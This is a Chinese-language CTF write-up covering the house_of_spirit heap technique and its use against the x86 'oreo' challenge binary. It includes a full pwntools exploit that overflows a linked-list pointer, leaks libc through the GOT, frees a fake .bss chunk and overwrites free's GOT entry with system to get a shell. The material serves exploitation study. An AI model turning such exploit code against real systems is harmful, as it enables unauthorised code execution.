    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n",
            (void *)&fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n",
            (void *)&fake_chunks[1], (void *)&fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

基本就是初始化堆之后,在栈上通过伪造一个chunk来free然后malloc出来

记两句吧:

在栈上伪造fake chunk时,next chunk.size要满足条件才能通过free的检查

The chunk.size of the next fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.

fake chunk的地址需要16字节对齐(x64),所以在申请临时变量时才用到了__attribute__ ((aligned (16)))

note that the memory address of the region associated with this chunk must be 16-byte aligned.

Debug

fake chunk伪造完成之后栈上布局如图所示:

free之后:

再次malloc结束之后可以看到RAX中的返回值便是fake chunk的data region

OREO

写了好久的x64 heap这次总算碰到一个x86的 : )

程序分析

(经过分析之后先逆出了结构体和符号)

main函数:

main函数就是一段初始化,然后进入menu

通过fgets(&s, 0x20, stdin);__isoc99_sscanf(&s, "%u", &v1)的组合来输入然后switch

<Rifile structure>

分析下面几个函数时,先逆出程序用到的一个结构体,具体如下

add

具体就是一个链表添加、结构体填充的操作(先填forward_ptr,再输入),全局变量head_ptr存放链表头指针,每次malloc一个refle(fast chunk),然后从对应的位置用fgets输入。两处溢出:refle_name处的溢出可以覆盖到下一个chunk的0x19字节内容,newL_to_zero是将最后的换行符换成\x00,最后++refle_num

ps:fgets(,n,)时会读取 n-1个字符,并且包括 \n,如果输入字符的长度(不包括 \n)大于等于 n-1,则截取输入中前 n-1个字符(此时没有 \n)并把第 n个字符处填充成 \x00。当输入长度小于 n-1时,会把 \n也读入,并在 \n后面一个字节处填充 \x00(直接回车也会)

Show added rifles

根据链表输出所有refle的内容

order

判断refle_num是否为0,不为0则获取链表头指针之后free掉链表上的每一个chunk,然后把头指针head_ptr置零,chunk中的forward_refle_ptr没有置零。然后++ordered_num

leave_message

输入0x80长度的notice到notice_ptr所指向的区域

show_stats

输出refle_num、ordered_num、notice

Exploit

程序本身没有进行 setbuf 操作,所以在执行输入输出操作的时候会申请缓冲区,初次调用 puts 时,malloc会分配缓冲区1024B 给stdout / 初次调用fgets时,malloc会分配缓冲区1024B 给stdin

所以一上来程序heap视图中就会有两个chunk,暂时觉得是知道怎么来的就好了 :(

这种链表题第一次自己写好像没有思路,先记录一下能想到的东西吧

leak:

leak libc的话,主要思路是通过溢出修改forward_ptr,使其指向对应GOT表的一些偏移,然后show added rifles时可以把函数的地址打印出来,leak chunk地址也可以通过这个方法,把forward_ptr改成head_ptr地址即可

leak stack好像行不通…

Arbitrary write:

程序只有三个输入点

  1. switch时调用的fgets + sscanf组合(应该没什么用,输入指针都是栈上的偏移)
  2. add中的fgets,指针是对于结构体(chunk)的偏移,但是head_ptr的值在其中不可控,是malloc返回后直接输入的
  3. leave_message中的fgets(notice_ptr, 0x80, stdin);这个是根据bss段上的一个指针来读取内容的

ps:然后……过了好久终于才把house_of_spirit和这个题结合起来,我太stupid了

可以通过修改forward_ptr,指向一个bss段上有我们可控值的地方

举例子拿上面第一个8B对齐的地址来说,如果我们add一个chunk然后修改forward_ptr指向这里,此时0x0804A29c处的值就是fake chunk的size字段,当然这里不可控所以我们要用第二个:0x0804A2A0,此时refle_num是可控的。

然后order的时候这块内存也会被free出来,只要我们保证house_of_spirit.c中提到的fake next chunk的size段是正常的就可以被正常free(对应的size段在notice上,对应在notice上的偏移为:0x0804A2A0+0x40+4-0x0804A2C0=36)

接着这块内存就可以被正常malloc出来,这个时候就有了可控的notice_ptr,然后再通过leave_message就可以达成Arbitrary write了!(自己花时间想出来了太开心 XD)

实现

leaklibc

1
2
3
4
5
6
7
8
9
printf_GOT=0x0804A234
libc_base=0
def leaklibc():
    """Leak a libc address through the rifle list and store the base in libc_base.

    Adds a rifle whose name is 27 filler bytes followed by printf_GOT, so the
    name overflow replaces the rifle's forward pointer. Listing the rifles
    then prints the bytes at that address as a second "Description".
    0x49670 is presumably printf's offset in the author's libc build - verify
    against the libc actually in use.
    """
    global libc_base
    add('a'*27+p32(printf_GOT),'b'*0x23)#change forward_ptr by refle_name
    show_added_rifles()
    # Skip the real rifle's description; the second one is the leaked GOT entry.
    p.recvuntil('Description: ')
    p.recvuntil('Description: ')
    libc_base=my_u32(p.recv(4))-0x49670

free target chunk

1
2
3
4
5
6
7
8
9
#Cycle to fakesize=0x3f
# Add 0x3f rifles so the rifle counter reaches 0x3f, then order once to free
# them all before the fake chunk is set up.
for i in range(0x3f):
    add('name','description')
order()

leave_message('\x00'*36+p32(0x41))#Set fake next chunk size

add('a'*27+p32(0x0804A2A8),'b'*0x23)
order()#Free our bss memory out

先add 0x3f个rifle然后order,目标chunk的size被设置成0x3f,然后构造fake next size来过free的检查,接着再add一个forward_ptr为目标chunk的rifle,此时目标chunk的size为0x40,然后free出目标chunk

set GOT

1
2
3
4
5
6
7
log.info("\033[1;36m" + 'free out' + "\033[0m")
add('name',p32(free_GOT))#Set notice_ptr to free_GOT

leaklibc()#Now leak libc
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")

leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))#Set free_GOT to system

再次malloc的时候就可以把目标chunk malloc出来了,然后直接在notice_ptr处填入free函数的GOT表地址

接着将system函数的实际地址填到free_GOT去

ps:leaklibc的操作要放到后面,要不然前面 leak之后再调用 order会出错,以及这里 free函数和 fgets的 GOT表项挨在一起,用 fgets 只填入 system 函数地址的话 fgets 的 GOT表项会被损坏(具体见前面所写的 fgets流程),程序往后运行会出错,所以这里填了两个

getshell

1
2
add('/bin/sh','/bin/sh')#Set /bin/sh for system(linked list head)
order()#free(head_ptr)=system(binsh_ptr)

这个应该不用解释了

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# Target binary path; reused below for context.binary, process() and ELF().
binary = './oreo' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# NOTE(review): the target's stdin/stdout are attached to a pseudo-terminal,
# presumably to influence its stdio buffering - confirm.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
# Unused string literal kept as a template for switching to a remote target.
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Pad a short leaked byte string with NULs to 8 / 4 bytes before unpacking it.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
# ub_offset and codebase are not referenced anywhere in the script below.
ub_offset = 0x3c4b30
codebase = 0x555555554000
#log.info("\033[1;36m" + hex(bin_addr) + "\033[0m")

# todo here
def add(name,description):
    """Pick menu action 1 and submit a rifle name and description.

    Each value is sent with a trailing newline once the matching prompt has
    been received on the process tube `p`.
    """
    p.recvuntil('Action: ')
    p.sendline('1')

    p.recvuntil('Rifle name: ')
    p.sendline(name)

    p.recvuntil('Rifle description: ')
    p.sendline(description)

def show_added_rifles():
    """Pick menu action 2; the caller is responsible for reading the listing."""
    p.recvuntil('Action: ')
    p.sendline('2')

def order():
    """Pick menu action 3 (order the rifles added so far)."""
    p.recvuntil('Action: ')
    p.sendline('3')

def leave_message(notice):
    """Pick menu action 4 and send `notice` once the message prompt appears."""
    p.recvuntil('Action: ')
    p.sendline('4')

    p.recvuntil('your order: ')
    p.sendline(notice)

def show_stats():
    """Pick menu action 5; the caller is responsible for reading the output."""
    p.recvuntil('Action: ')
    p.sendline('5')

# Addresses and offsets used by the exploit.
# NOTE(review): the GOT addresses and libc offsets are presumably specific to
# the author's binary and libc build - verify before reuse.
printf_GOT=0x0804A234
# Placeholder; overwritten by leaklibc() once the leak has been read.
libc_base=0
system_offset=0x3ada0
free_GOT=0x0804A238
fgets_offset=0x5e150
def leaklibc():
    """Leak a libc address through the rifle list and store the base in libc_base.

    Adds a rifle whose name is 27 filler bytes followed by printf_GOT, so the
    name overflow replaces the rifle's forward pointer. Listing the rifles
    then prints the bytes at that address as a second "Description".
    0x49670 is presumably printf's offset in the author's libc build - verify
    against the libc actually in use.
    """
    global libc_base
    add('a'*27+p32(printf_GOT),'b'*0x23)
    show_added_rifles()
    # Skip the real rifle's description; the second one is the leaked GOT entry.
    p.recvuntil('Description: ')
    p.recvuntil('Description: ')
    libc_base=my_u32(p.recv(4))-0x49670

#Cycle to fakesize=0x3f
# Add 0x3f rifles so the rifle counter reaches 0x3f, then order once to free
# them all before the fake chunk is set up.
for i in range(0x3f):
    add('name','description')
order()

# Offset 36 into the notice buffer is where free() will look for the size of
# the chunk following the fake one; the leading zero bytes fill the space before it.
leave_message('\x00'*36+p32(0x41))#Set fake next chunk size

# This add brings the rifle counter to 0x40 and overflows the name so the new
# rifle's forward pointer refers to the fake chunk at 0x0804A2A8.
add('a'*27+p32(0x0804A2A8),'b'*0x23)
order()#Free our bss memory out

log.info("\033[1;36m" + 'free out' + "\033[0m")
# The next allocation is expected to return the freed fake chunk, so the
# description write lands on notice_ptr.
add('name',p32(free_GOT))#Set notice_ptr to free_GOT

# The leak runs only now, after the last order() that must behave normally.
leaklibc()#Now leak libc
log.info("\033[1;36m" + 'libc_base:'+hex(libc_base) + "\033[0m")

# Two words are written: the slot after free's GOT entry is fgets, and the
# terminator fgets appends would otherwise corrupt it.
leave_message(p32(system_offset+libc_base)+p32(fgets_offset+libc_base))#Set free_GOT to system
add('/bin/sh','/bin/sh')#Set /bin/sh for system (linked list head)
order()#free(head_ptr)=system(binsh_ptr)
#getshell
p.interactive()